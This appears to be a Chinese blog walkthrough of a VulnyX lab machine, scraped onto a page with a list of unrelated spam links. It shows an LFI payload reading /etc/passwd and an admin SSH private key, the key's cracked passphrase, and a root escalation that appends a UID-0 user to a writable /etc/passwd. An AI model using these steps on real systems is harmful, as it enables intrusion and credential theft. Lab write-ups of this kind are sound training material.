当前位置: 首页 > wzjs >正文

网站模板的修改网站建设优化哪家公司好

网站模板的修改,网站建设优化哪家公司好,域名注册平台的网站怎么做,东莞智通人才招聘网下载https://vulnyx.com/ 打点 nmap $IP > 22,80 端口 gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt 得到一些目录信息,看了一下没发现什么 框架看不出什么 看一下源码是否存在敏感信息硬编码,太多了…

https://vulnyx.com/

打点

nmap $IP

==> 22,80 端口

gobuster dir -u $URL -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt

得到一些目录信息,看了一下没发现什么

框架看不出什么

看一下源码是否存在敏感信息硬编码,太多了,似乎没有

开发者控制台全局搜索敏感字段或者路由

http://

php

api …

在这里插入图片描述
找到 LFI 路由 li><a href="doctor-item.php?include=Doctors.html">Doctors</a></li>
浏览器拼接后访问 ?include=/etc/passd

|root:x:0:0:root:/root:/bin/bash|
||daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin|
||bin:x:2:2:bin:/bin:/usr/sbin/nologin|
||sys:x:3:3:sys:/dev:/usr/sbin/nologin|
||sync:x:4:65534:sync:/bin:/bin/sync|
||games:x:5:60:games:/usr/games:/usr/sbin/nologin|
||man:x:6:12:man:/var/cache/man:/usr/sbin/nologin|
||lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin|
||mail:x:8:8:mail:/var/mail:/usr/sbin/nologin|
||news:x:9:9:news:/var/spool/news:/usr/sbin/nologin|
||uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin|
||proxy:x:13:13:proxy:/bin:/usr/sbin/nologin|
||www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin|
||backup:x:34:34:backup:/var/backups:/usr/sbin/nologin|
||list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin|
||irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin|
||gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin|
||nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin|
||_apt:x:100:65534::/nonexistent:/usr/sbin/nologin|
||systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin|
||systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin|
||systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin|
||messagebus:x:104:110::/nonexistent:/usr/sbin/nologin|
||sshd:x:105:65534::/run/sshd:/usr/sbin/nologin|
||systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin|
||admin:x:1000:1000:admin:/home/admin:/bin/bash|

知道了存在 admin 用户

再次包含获得其私钥

?include=/home/admin/.ssh/id_rsa

|---|
|-----BEGIN RSA PRIVATE KEY-----|
||Proc-Type: 4,ENCRYPTED|
||DEK-Info: DES-EDE3-CBC,9FB14B3F3D04E90E|
|||
||uuQm2CFIe/eZT5pNyQ6+K1Uap/FYWcsEklzONt+x4AO6FmjFmR8RUpwMHurmbRC6|
||hqyoiv8vgpQgQRPYMzJ3QgS9kUCGdgC5+cXlNCST/GKQOS4QMQMUTacjZZ8EJzoe|
||o7+7tCB8Zk/sW7b8c3m4Cz0CmE5mut8ZyuTnB0SAlGAQfZjqsldugHjZ1t17mldb|
||+gzWGBUmKTOLO/gcuAZC+Tj+BoGkb2gneiMA85oJX6y/dqq4Ir10Qom+0tOFsuot|
||b7A9XTubgElslUEm8fGW64kX3x3LtXRsoR12n+krZ6T+IOTzThMWExR1Wxp4Ub/k|
||HtXTzdvDQBbgBf4h08qyCOxGEaVZHKaV/ynGnOv0zhlZ+z163SjppVPK07H4bdLg|
||9SC1omYunvJgunMS0ATC8uAWzoQ5Iz5ka0h+NOofUrVtfJZ/OnhtMKW+M948EgnY|
||zh7Ffq1KlMjZHxnIS3bdcl4MFV0F3Hpx+iDukvyfeeWKuoeUuvzNfVKVPZKqyaJu|
||rRqnxYW/fzdJm+8XViMQccgQAaZ+Zb2rVW0gyifsEigxShdaT5PGdJFKKVLS+bD1|
||tHBy6UOhKCn3H8edtXwvZN+9PDGDzUcEpr9xYCLkmH+hcr06ypUtlu9UrePLh/Xs|
||94KATK4joOIW7O8GnPdKBiI+3Hk0qakL1kyYQVBtMjKTyEM8yRcssGZr/MdVnYWm|
||VD5pEdAybKBfBG/xVu2CR378BRKzlJkiyqRjXQLoFMVDz3I30RpjbpfYQs2Dm2M7|
||Mb26wNQW4ff7qe30K/Ixrm7MfkJPzueQlSi94IHXaPvl4vyCoPLW89JzsNDsvG8P|
||hrkWRpPIwpzKdtMPwQbkPu4ykqgKkYYRmVlfX8oeis3C1hCjqvp3Lth0QDI+7Shr|
||Fb5w0n0qfDT4o03U1Pun2iqdI4M+iDZUF4S0BD3xA/zp+d98NnGlRqMmJK+StmqR|
||IIk3DRRkvMxxCm12g2DotRUgT2+mgaZ3nq55eqzXRh0U1P5QfhO+V8WzbVzhP6+R|
||MtqgW1L0iAgB4CnTIud6DpXQtR9l//9alrXa+4nWcDW2GoKjljxOKNK8jXs58SnS|
||62LrvcNZVokZjql8Xi7xL0XbEk0gtpItLtX7xAHLFTVZt4UH6csOcwq5vvJAGh69|
||Q/ikz5XmyQ+wDwQEQDzNeOj9zBh1+1zrdmt0m7hI5WnIJakEM2vqCqluN5CEs4u8|
||p1ia+meL0JVlLobfnUgxi3Qzm9SF2pifQdePVU4GXGhIOBUf34bts0iEIDf+qx2C|
||pwxoAe1tMmInlZfR2sKVlIeHIBfHq/hPf2PHvU0cpz7MzfY36x9ufZc5MH2JDT8X|
||KREAJ3S0pMplP/ZcXjRLOlESQXeUQ2yvb61m+zphg0QjWH131gnaBIhVIj1nLnTa|
||i99+vYdwe8+8nJq4/WXhkN+VTYXndET2H0fFNTFAqbk2HGy6+6qS/4Q6DVVxTHdp|
||4Dg2QRnRTjp74dQ1NZ7juucvW7DBFE+CK80dkrr9yFyybVUqBwHrmmQVFGLkS2I/|
||8kOVjIjFKkGQ4rNRWKVoo/HaRoI/f2G6tbEiOVclUMT8iutAg8S4VA==|
||-----END RSA PRIVATE KEY-----|

把私钥放到本地,利用私钥破解 admin 密码

ssh2john id_rsa > hash
john hash

得到密码 unicorn

为密钥加权限,然后 ssh 登录 admin 用户

chmod 400 id_rsa
ssh -i id_rsa admin@$IP

登陆成功!

提权

sudo -l 查找特权命令无结果
find / -perm -4000 2>/dev/null 查找 SUID 位文件,没利用点
admin 用户目录也没什么文件

上传 linpeas 对其机器进行扫描

发现危险点:/etc/passwd 可写

于是生成密码写入 /etc/passwd

openssl passwd -1 123456

  • -1(数字1)​
    指定使用 ​​MD5-based crypt(3)​​ 哈希算法(比默认的 DES 更强,但已过时)。

  • 123456
    要哈希的明文密码(这里是 123456)。

然后在 /etc/passwd 末尾添加写好的用户

echo 'neuroblue:$1$qChnE9cC$.MwvcnjrvMRUXpWiUiZ9V0:0:0:neuroblue:/root:/bin/bash'

写入成功后,切换为 neuroblue,获得 root 权限

su neuroblue

最后,全局查找 flag 即可

find / -name 'user.txt' -o -name 'root.txt' | xargs cat

结束!

总结

前端找到敏感路由,敏感词 php include

本地包含 passwd 和 id_rsa 进行用户登录

上传 linpeas 扫描,且利用 /etc/passwd 可写进行提权

http://www.dtcms.com/wzjs/248688.html

相关文章:

  • 汉中城乡建设网站首页外链发布论坛
  • 网站做软件有哪些内容微博上如何做网站推广
  • vs2012网站开发网店seo排名优化
  • 大连网站建设制作好的网络推广平台
  • 南昌网站建设排行谷歌google官网下载
  • 用台电脑做网站网站排名首页前三位
  • 大连模板建站哪家好永州网络推广
  • 建设银行网站显示404重庆广告公司
  • 常州网站建设费用营销策划公司排名
  • 福州网站建设网络公司微博推广效果怎么样
  • 公司做网站费用营销软文范文
  • ipv6网站制作今天最新新闻10条
  • 上海交通公安门户网站如何优化关键词排名到首页
  • 学院网站建设的意义手机关键词点击排名软件
  • 怎么用Visio studio做网站搜索排名优化
  • 四川招投标网seo关键词优化的技巧和方法
  • 电脑无法登录建设银行网站线上营销的优势
  • 响应式网站案列杭州免费网站制作
  • 外贸网店怎么开什么是seo如何进行seo
  • 发现了一个做字素的网站网站维护中是什么意思
  • 成都网站建设xhbrandseo实战教程
  • 绍兴商城网站开发设计今日热榜
  • 网站建设资源网络营销推广方法有哪些
  • 政府门户网站建设的重点百度查重入口
  • 北京手机网站建设长沙百度快速优化
  • 做网站添加本地图片优化关键词的正确方法
  • 广东网站优化黄石seo诊断
  • java做网站开发什么推广方法是有效果的
  • 销售型网站建设真正的免费建站在这里
  • 做t恤的网站站长之家app下载